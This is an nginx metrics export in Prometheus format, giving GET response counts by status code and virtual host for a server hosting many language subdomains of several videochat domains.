nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.show"} 175 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.tv.br"} 1104 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tr.videochat.world"} 1619 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="trmsmbe.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tsgzrsco.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tsprruevdbte.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tsxnphe.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.cafe"} 1332 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.date"} 768 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.mx"} 1418 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.show"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.tv.br"} 1511 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="tt.videochat.world"} 1509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="twaxolo.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uat.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.cafe"} 790 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.date"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.mx"} 1652 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.show"} 211 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.tv.br"} 1021 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="udm.videochat.world"} 1098 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uevdbte.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.cafe"} 1110 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.date"} 2931 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.mx"} 1230 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.show"} 724 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.tv.br"} 1147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uk.videochat.world"} 1576 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="umuyham.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.cafe"} 1264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.date"} 794 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.mx"} 1917 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.show"} 335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.tv.br"} 1289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ur.videochat.world"} 3721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="usavbchm.videochat.mx"} 577 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="user.fangyu.io"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uvdbouz.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uxoskmy.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.cafe"} 1547 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.date"} 916 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.mx"} 1612 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.show"} 750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.tv.br"} 2243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uz.videochat.world"} 2762 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="uzuvnis.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="v.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vawuuur.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vbmqkckupris.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vdqcuyi.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="veevuga.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.cafe"} 1009 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.date"} 555 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.mx"} 1261 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.show"} 268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.tv.br"} 1041 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vi.videochat.world"} 1423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.cafe"} 19714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.date"} 18008 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.mx"} 22017 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.show"} 9965 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.tv.br"} 63816 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="videochat.world"} 28312 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="visionsoult.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vkqwqvpmfscy.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vksvfmr.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vmi460104.contaboserver.net"} 937 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vnhggbn.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vpmfscy.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="vzknpzh.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="waqqvxh.videochat.mx"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="whuinar.videochat.mx"} 169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="whxqusco.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="wjftnkk.videochat.mx"} 59 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="wngqune.videochat.mx"} 366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="wwswnaz.videochat.mx"} 427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.agmeta.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.talddd.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.cafe"} 771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.date"} 1144 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.mx"} 1890 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.show"} 508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="www.videochat.world"} 1283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xblqbkn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xbobmit.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xbodfbs.videochat.mx"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xgyvqlo.videochat.mx"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.cafe"} 717 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.date"} 224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.mx"} 1537 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.show"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.tv.br"} 1121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xh.videochat.world"} 2346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xngalzycbazrhffuzjrval.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xnsplzh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xvaqpeo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xztqyzh.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="xzxksro.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="y3.y3ccc.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ybifrit.videochat.mx"} 420 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ydvzjhr.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yfhzjyi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yfutyaz.videochat.mx"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.cafe"} 1621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.date"} 330 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.mx"} 1505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.show"} 318 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.tv.br"} 2945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yi.videochat.world"} 2015 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yiceklv.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ymwkrsi.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ysxutfskyuka.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ywmnhmrj.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="yzozfpbszvar.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zdchomr.videochat.mx"} 380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zdkfdnl.videochat.mx"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.cafe"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.date"} 2968 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.mx"} 1522 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.show"} 737 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.tv.br"} 763 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zh.videochat.world"} 1744 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zmhblfceameo.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zplieen.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zqrrnit.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zqtfbuk.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zrhffuzjrval.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zxjzggl.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zycbazrhffuzjrval.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="zzgoelo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="af.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.tv.br"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ar.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="az.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ba.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ba.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="bg.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ca.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="chm.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="chm.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="cs.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="cy.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="da.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="de.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ee.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="en.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="es.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="et.videochat.tv.br"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="et.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="eu.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fa.videochat.tv.br"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="fr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ga.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="gl.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="hi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ht.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="hu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="is.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="is.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="it.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ka.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ky.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="lo.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mi.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mi.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mr.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ms.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mt.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="mt.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ne.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pa.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pt.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="pt.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sco.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sl.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="sr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="su.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="te.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="th.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="tt.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="tt.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="udm.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="uk.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="ur.videochat.tv.br"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="uz.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="xh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="yi.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="zh.videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="304",vhost="zh.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost=""} 322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="-"} 14456 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="/"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="/cgibin"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="161.97.120.25"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="161.97.120.25:80"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="be.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="cy.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="es.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="eu.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="fa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="fr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="it.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="ka.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="mrj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="pa.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="pl.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="si.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="tg.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="400",vhost="uk.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="161.97.120.25"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="af.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="al.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="am.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="ar.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="ba.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="bs.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="cs.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="eo.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="es.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="et.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="he.videochat.world"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="hi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="hr.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="is.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="it.videochat.date"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="it.videochat.show"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="jp.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="km.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="kn.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="ko.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="mail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="ml.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="mt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="my.videochat.cafe"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="ne.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="no.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="pa.videochat.show"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="pt.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="sco.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="sco.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="sw.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="te.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="th.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="tl.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.cafe"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.mx"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.show"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.tv.br"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="videochat.world"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="www.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="403",vhost="yi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="-"} 1647 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="103.3.60.134"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 529 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.097.120.025"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.97.120.25"} 14787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="161.97.120.25:80"} 9622 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="25.120.97.161:80"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="2az1eq5bcj.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="32574156-jh888-17.tcr195p888.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 804 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="757d6906-483e-45fa-b64f-440bc23e7d63.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="75z830.cc"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="773b50.cc:61234"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 419 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="404",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 636 